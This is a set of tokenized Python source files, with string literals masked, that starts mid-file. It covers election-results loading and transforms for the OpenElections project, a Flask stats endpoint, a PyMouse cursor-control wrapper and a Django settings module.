<EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> contest_winner = row [ '<STR_LIT>' ] . strip ( ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . 
copy ( ) <EOL> rr_kwargs [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> county_ocd_id = [ c for c in self . datasource . _jurisdictions ( ) if c [ '<STR_LIT>' ] . upper ( ) == row [ '<STR_LIT>' ] . upper ( ) ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( county_ocd_id , ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } <EOL> class MTCountyLoader ( MTBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . 
_skip_row ( row ) : <EOL> continue <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> if '<STR_LIT>' in row [ '<STR_LIT>' ] . upper ( ) : <EOL> votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> ocd_id = None <EOL> jurisdiction = "<STR_LIT>" <EOL> else : <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> votes = None <EOL> else : <EOL> votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> print row [ '<STR_LIT>' ] <EOL> ocd_id = [ o [ '<STR_LIT>' ] for o in self . datasource . _jurisdictions ( ) if row [ '<STR_LIT>' ] . strip ( ) == o [ '<STR_LIT>' ] ] [ <NUM_LIT:0> ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : ocd_id , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : votes <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } </s>
<s> from datetime import datetime <EOL> import logging <EOL> import re <EOL> from nameparser import HumanName <EOL> from openelex . base . transform import Transform , registry <EOL> from openelex . models import Candidate , Contest , Office , Party , RawResult , Result <EOL> from openelex . lib . text import ocd_type_id <EOL> from openelex . lib . insertbuffer import BulkInsertBuffer <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> meta_fields = [ '<STR_LIT:source>' , '<STR_LIT>' , '<STR_LIT:state>' , ] <EOL> contest_fields = meta_fields + [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> candidate_fields = meta_fields + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_fields = meta_fields + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> STATE = '<STR_LIT>' <EOL> class BaseTransform ( Transform ) : <EOL> """<STR_LIT>""" <EOL> PARTY_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> 
'<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def __init__ ( self ) : <EOL> super ( BaseTransform , self ) . __init__ ( ) <EOL> self . _office_cache = { } <EOL> self . _party_cache = { } <EOL> self . _contest_cache = { } <EOL> def get_raw_results ( self ) : <EOL> return RawResult . objects . filter ( state = STATE ) . no_cache ( ) <EOL> def get_contest_fields ( self , raw_result ) : <EOL> fields = self . 
_get_fields ( raw_result , contest_fields ) <EOL> fields [ '<STR_LIT>' ] = self . _get_office ( raw_result ) <EOL> return fields <EOL> def _get_fields ( self , raw_result , field_names ) : <EOL> return { k : getattr ( raw_result , k ) for k in field_names } <EOL> def _get_office ( self , raw_result ) : <EOL> office_query = { <EOL> '<STR_LIT:state>' : STATE , <EOL> '<STR_LIT:name>' : self . _clean_office ( raw_result . office ) <EOL> } <EOL> if office_query [ '<STR_LIT:name>' ] is '<STR_LIT>' : <EOL> office_query [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> if office_query [ '<STR_LIT:name>' ] in self . district_offices : <EOL> office_query [ '<STR_LIT>' ] = raw_result . district or '<STR_LIT>' <EOL> key = Office . make_key ( ** office_query ) <EOL> try : <EOL> return self . _office_cache [ key ] <EOL> except KeyError : <EOL> try : <EOL> office = Office . objects . get ( ** office_query ) <EOL> assert key == office . key <EOL> self . _office_cache [ key ] = office <EOL> return office <EOL> except Office . DoesNotExist : <EOL> logger . error ( "<STR_LIT>" . format ( office_query ) ) <EOL> raise <EOL> def get_party ( self , raw_result , attr = '<STR_LIT>' ) : <EOL> party = getattr ( raw_result , attr ) <EOL> if not party : <EOL> return None <EOL> clean_abbrev = self . _clean_party ( party ) <EOL> if not clean_abbrev : <EOL> return None <EOL> try : <EOL> return self . _party_cache [ clean_abbrev ] <EOL> except KeyError : <EOL> try : <EOL> party = Party . objects . get ( abbrev = clean_abbrev ) <EOL> self . _party_cache [ clean_abbrev ] = party <EOL> return party <EOL> except Party . DoesNotExist : <EOL> logger . error ( "<STR_LIT>" . format ( clean_abbrev ) ) <EOL> raise <EOL> def _clean_party ( self , party ) : <EOL> try : <EOL> return self . PARTY_MAP [ party ] <EOL> except KeyError : <EOL> return None <EOL> def _clean_office ( self , office ) : <EOL> """<STR_LIT>""" <EOL> presidential_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> senate_regex = re . 
compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> house_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> governor_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> treasurer_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> auditor_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> sos_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> lt_gov_regex = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> ospi_regex = re . compile ( <EOL> '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> ag_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> wcpl_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> local_regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> national_regex = re . compile ( <EOL> r'<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> if re . search ( house_regex , office ) : <EOL> if re . search ( national_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( local_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> elif re . search ( governor_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( wcpl_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( senate_regex , office ) : <EOL> if re . search ( national_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( local_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> elif re . search ( lt_gov_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( ospi_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( sos_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( treasurer_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( auditor_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( ag_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . 
search ( presidential_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> def get_candidate_fields ( self , raw_result ) : <EOL> year = raw_result . end_date . year <EOL> fields = self . _get_fields ( raw_result , candidate_fields ) <EOL> try : <EOL> name = HumanName ( raw_result . full_name ) <EOL> except TypeError : <EOL> name = HumanName ( "<STR_LIT>" . format ( raw_result . given_name , raw_result . family_name ) ) <EOL> fields [ '<STR_LIT>' ] = name . first <EOL> fields [ '<STR_LIT>' ] = name . last <EOL> if not fields [ '<STR_LIT>' ] : <EOL> fields [ '<STR_LIT>' ] = "<STR_LIT>" . format ( name . first , name . last ) <EOL> try : <EOL> fields [ '<STR_LIT>' ] = name . middle <EOL> fields [ '<STR_LIT>' ] = name . suffix <EOL> except Exception , e : <EOL> logger . error ( e ) <EOL> return fields <EOL> def get_contest ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> key = "<STR_LIT>" % ( raw_result . election_id , raw_result . contest_slug ) <EOL> try : <EOL> return self . _contest_cache [ key ] <EOL> except KeyError : <EOL> fields = self . get_contest_fields ( raw_result ) <EOL> fields . pop ( '<STR_LIT:source>' ) <EOL> try : <EOL> try : <EOL> contest = Contest . objects . filter ( ** fields ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> contest = Contest . objects . get ( ** fields ) <EOL> except Exception : <EOL> print fields <EOL> print "<STR_LIT:\n>" <EOL> raise <EOL> self . _contest_cache [ key ] = contest <EOL> return contest <EOL> class CreateContestsTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self ) : <EOL> contests = [ ] <EOL> seen = set ( ) <EOL> for result in self . get_raw_results ( ) : <EOL> key = self . _contest_key ( result ) <EOL> if key not in seen : <EOL> fields = self . get_contest_fields ( result ) <EOL> fields [ '<STR_LIT>' ] = fields [ '<STR_LIT>' ] = datetime . now ( ) <EOL> contest = Contest ( ** fields ) <EOL> contests . append ( contest ) <EOL> seen . 
add ( key ) <EOL> print seen <EOL> Contest . objects . insert ( contests , load_bulk = False ) <EOL> logger . info ( "<STR_LIT>" . format ( len ( contests ) ) ) <EOL> def reverse ( self ) : <EOL> old = Contest . objects . filter ( state = STATE ) <EOL> logger . info ( '<STR_LIT>' . format ( old . count ( ) ) ) <EOL> old . delete ( ) <EOL> def _contest_key ( self , raw_result ) : <EOL> slug = raw_result . contest_slug <EOL> return ( raw_result . election_id , slug ) <EOL> class CreateCandidatesTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( CreateCandidatesTransform , self ) . __init__ ( ) <EOL> def __call__ ( self ) : <EOL> candidates = [ ] <EOL> seen = set ( ) <EOL> for rr in self . get_raw_results ( ) : <EOL> key = ( rr . election_id , rr . contest_slug , rr . candidate_slug ) <EOL> if key not in seen : <EOL> fields = self . get_candidate_fields ( rr ) <EOL> if not fields [ '<STR_LIT>' ] : <EOL> quit ( fields ) <EOL> fields [ '<STR_LIT>' ] = self . get_contest ( rr ) <EOL> candidate = Candidate ( ** fields ) <EOL> candidates . append ( candidate ) <EOL> seen . add ( key ) <EOL> Candidate . objects . insert ( candidates , load_bulk = False ) <EOL> logger . info ( "<STR_LIT>" . format ( len ( candidates ) ) ) <EOL> def reverse ( self ) : <EOL> old = Candidate . objects . filter ( state = STATE ) <EOL> print "<STR_LIT>" % old . count ( ) <EOL> old . delete ( ) <EOL> class CreateResultsTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> auto_reverse = True <EOL> def __init__ ( self ) : <EOL> super ( CreateResultsTransform , self ) . __init__ ( ) <EOL> self . _candidate_cache = { } <EOL> def get_raw_results ( self ) : <EOL> return RawResult . objects . filter ( state = STATE ) . no_cache ( ) <EOL> def get_results ( self ) : <EOL> election_ids = self . get_raw_results ( ) . distinct ( '<STR_LIT>' ) <EOL> return Result . objects . 
filter ( election_id__in = election_ids ) <EOL> def __call__ ( self ) : <EOL> results = self . _create_results_collection ( ) <EOL> for rr in self . get_raw_results ( ) : <EOL> fields = self . _get_fields ( rr , result_fields ) <EOL> fields [ '<STR_LIT>' ] = self . get_contest ( rr ) <EOL> fields [ '<STR_LIT>' ] = self . get_candidate ( rr , extra = { <EOL> '<STR_LIT>' : fields [ '<STR_LIT>' ] , <EOL> } ) <EOL> fields [ '<STR_LIT>' ] = fields [ '<STR_LIT>' ] . contest <EOL> fields [ '<STR_LIT>' ] = rr <EOL> party = self . get_party ( rr ) <EOL> if party : <EOL> fields [ '<STR_LIT>' ] = party . abbrev <EOL> fields [ '<STR_LIT>' ] = self . _strip_leading_zeros ( rr . jurisdiction ) <EOL> fields = self . _alter_result_fields ( fields , rr ) <EOL> result = Result ( ** fields ) <EOL> results . append ( result ) <EOL> self . _create_results ( results ) <EOL> def _alter_result_fields ( self , fields , raw_result ) : <EOL> """<STR_LIT>""" <EOL> fields [ '<STR_LIT>' ] = self . _parse_write_in ( raw_result ) <EOL> fields [ '<STR_LIT>' ] = self . _get_ocd_id ( raw_result , <EOL> jurisdiction = fields [ '<STR_LIT>' ] ) <EOL> return fields <EOL> def _create_results_collection ( self ) : <EOL> """<STR_LIT>""" <EOL> return BulkInsertBuffer ( Result ) <EOL> def _create_results ( self , results ) : <EOL> """<STR_LIT>""" <EOL> results . flush ( ) <EOL> print "<STR_LIT>" % results . count ( ) <EOL> def reverse ( self ) : <EOL> old_results = self . get_results ( ) <EOL> print "<STR_LIT>" % old_results . count ( ) <EOL> old_results . delete ( ) <EOL> def get_candidate ( self , raw_result , extra = { } ) : <EOL> """<STR_LIT>""" <EOL> key = ( raw_result . election_id , raw_result . contest_slug , <EOL> raw_result . candidate_slug ) <EOL> try : <EOL> return self . _candidate_cache [ key ] <EOL> except KeyError : <EOL> fields = self . get_candidate_fields ( raw_result ) <EOL> fields . update ( extra ) <EOL> del fields [ '<STR_LIT:source>' ] <EOL> try : <EOL> candidate = Candidate . 
objects . get ( ** fields ) <EOL> except Candidate . DoesNotExist : <EOL> print fields <EOL> raise <EOL> self . _candidate_cache [ key ] = candidate <EOL> return candidate <EOL> def _parse_winner ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> if raw_result . winner == '<STR_LIT:Y>' : <EOL> return True <EOL> elif raw_result . winner == <NUM_LIT:1> : <EOL> return True <EOL> else : <EOL> return False <EOL> def _parse_write_in ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> if raw_result . write_in == '<STR_LIT:Y>' : <EOL> return True <EOL> elif raw_result . family_name == '<STR_LIT>' : <EOL> return True <EOL> elif raw_result . write_in == "<STR_LIT>" : <EOL> return True <EOL> elif raw_result . full_name == "<STR_LIT>" : <EOL> return True <EOL> else : <EOL> return False <EOL> def _get_ocd_id ( self , raw_result , jurisdiction = None , reporting_level = None ) : <EOL> """<STR_LIT>""" <EOL> if reporting_level is None : <EOL> reporting_level = raw_result . reporting_level <EOL> if jurisdiction is None : <EOL> jurisdiction = raw_result . jurisdiction <EOL> juris_ocd = ocd_type_id ( jurisdiction ) <EOL> if reporting_level == "<STR_LIT>" : <EOL> return "<STR_LIT>" % juris_ocd <EOL> elif reporting_level == "<STR_LIT>" : <EOL> return "<STR_LIT>" % juris_ocd <EOL> elif reporting_level == "<STR_LIT>" : <EOL> county_ocd_id = "<STR_LIT:/>" . join ( raw_result . ocd_id . split ( '<STR_LIT:/>' ) [ : - <NUM_LIT:1> ] ) <EOL> return "<STR_LIT>" % ( county_ocd_id , juris_ocd ) <EOL> else : <EOL> return None <EOL> registry . register ( '<STR_LIT>' , CreateContestsTransform ) <EOL> registry . register ( '<STR_LIT>' , CreateCandidatesTransform ) <EOL> registry . register ( '<STR_LIT>' , CreateResultsTransform ) </s>
<s> import json <EOL> import pymongo <EOL> from flask import request , abort , json , render_template , Response <EOL> from flask . ext import restful <EOL> from flask . ext . restful import reqparse <EOL> from flask_rest_service import app , api , mongo <EOL> from bson . objectid import ObjectId <EOL> from bson . code import Code <EOL> class Stats ( restful . Resource ) : <EOL> def get ( self ) : <EOL> return Response ( render_template ( "<STR_LIT>" ) , mimetype = '<STR_LIT>' ) <EOL> api . add_resource ( Stats , '<STR_LIT>' ) </s>
<s> from pymouse import PyMouse <EOL> mouse = PyMouse ( ) <EOL> def AbsoluteMouseMove ( posx , posy ) : <EOL> print '<STR_LIT>' , posx , posy <EOL> mouse . move ( int ( posx ) , int ( posy ) ) <EOL> def AbsoluteMouseClick ( posx , posy ) : <EOL> print '<STR_LIT>' , posx , posy <EOL> mouse . click ( posx , posy ) <EOL> def AbsoluteMouseClickDown ( posx , posy ) : <EOL> print '<STR_LIT>' <EOL> mouse . press ( posx , posy ) <EOL> def AbsoluteMouseClickUp ( posx , posy ) : <EOL> print '<STR_LIT>' <EOL> mouse . release ( posx , posy ) <EOL> def AbsoluteMouseDrag ( posx , posy ) : <EOL> mouse . move ( posx , posy ) <EOL> def AbsoluteMouseRightClick ( posx , posy ) : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:2> ) <EOL> def AbsoluteMouseScroll ( posx , posy , up = True ) : <EOL> if up is True : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:4> ) <EOL> elif up is False : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:5> ) <EOL> def GetDisplayWidth ( ) : <EOL> return mouse . screen_size ( ) [ <NUM_LIT:0> ] <EOL> def GetDisplayHeight ( ) : <EOL> return mouse . screen_size ( ) [ <NUM_LIT:1> ] <EOL> class absolute_cursor ( object ) : <EOL> def __init__ ( self ) : <EOL> self . x_max = GetDisplayWidth ( ) - <NUM_LIT:1> <EOL> self . y_max = GetDisplayHeight ( ) - <NUM_LIT:1> <EOL> self . left_button_pressed = False <EOL> self . x = <NUM_LIT:0> <EOL> self . y = <NUM_LIT:0> <EOL> def move ( self , posx , posy ) : <EOL> self . x = posx <EOL> self . y = posy <EOL> if self . x > self . x_max : <EOL> self . x = self . x_max <EOL> if self . y > self . y_max : <EOL> self . y = self . y_max <EOL> if self . x < <NUM_LIT:0.0> : <EOL> self . x = <NUM_LIT:0.0> <EOL> if self . y < <NUM_LIT:0.0> : <EOL> self . y = <NUM_LIT:0.0> <EOL> if self . left_button_pressed : <EOL> AbsoluteMouseDrag ( self . x , self . y ) <EOL> else : <EOL> AbsoluteMouseMove ( self . x , self . y ) <EOL> def click ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . 
x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClick ( posx , posy ) <EOL> def set_left_button_pressed ( self , boolean_button ) : <EOL> if boolean_button == True : <EOL> self . click_down ( ) <EOL> else : <EOL> self . click_up ( ) <EOL> def click_down ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClickDown ( posx , posy ) <EOL> self . left_button_pressed = True <EOL> def click_up ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClickUp ( posx , posy ) <EOL> self . left_button_pressed = False <EOL> def rightClick ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseRightClick ( posx , posy ) <EOL> def scroll ( self , x_movement , y_movement ) : <EOL> posx = self . x <EOL> posy = self . y <EOL> up = False <EOL> if y_movement < <NUM_LIT:0> : <EOL> up = True <EOL> AbsoluteMouseScroll ( posx , posy , up ) <EOL> class relative_cursor ( absolute_cursor ) : <EOL> def __init__ ( self ) : <EOL> absolute_cursor . __init__ ( self ) <EOL> def move ( self , x_amt , y_amt ) : <EOL> self . x = self . x + x_amt <EOL> self . y = self . y + y_amt <EOL> if self . x > self . x_max : <EOL> self . x = self . x_max <EOL> if self . y > self . y_max : <EOL> self . y = self . y_max <EOL> if self . x < <NUM_LIT:0.0> : <EOL> self . x = <NUM_LIT:0.0> <EOL> if self . y < <NUM_LIT:0.0> : <EOL> self . y = <NUM_LIT:0.0> <EOL> if self . left_button_pressed : <EOL> AbsoluteMouseDrag ( self . x , self . y ) <EOL> else : <EOL> AbsoluteMouseMove ( self . x , self . y ) </s>
<s> import os <EOL> import os . path <EOL> PROJECT_PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT:False>' ) == '<STR_LIT:True>' : <EOL> DEBUG = True <EOL> else : <EOL> DEBUG = False <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> import dj_database_url <EOL> DATABASES = { '<STR_LIT:default>' : dj_database_url . config ( ) } <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT:/>' <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = os . path . join ( PROJECT_PATH , '<STR_LIT>' ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> os . path . join ( PROJECT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = os . environ . get ( '<STR_LIT>' ) <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> import os <EOL> DIRNAME = os . path . dirname ( __file__ ) <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( DIRNAME , '<STR_LIT>' ) , <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:file>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : os . path . 
join ( PROJECT_PATH , '<STR_LIT>' ) <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:file>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } , <EOL> } </s>
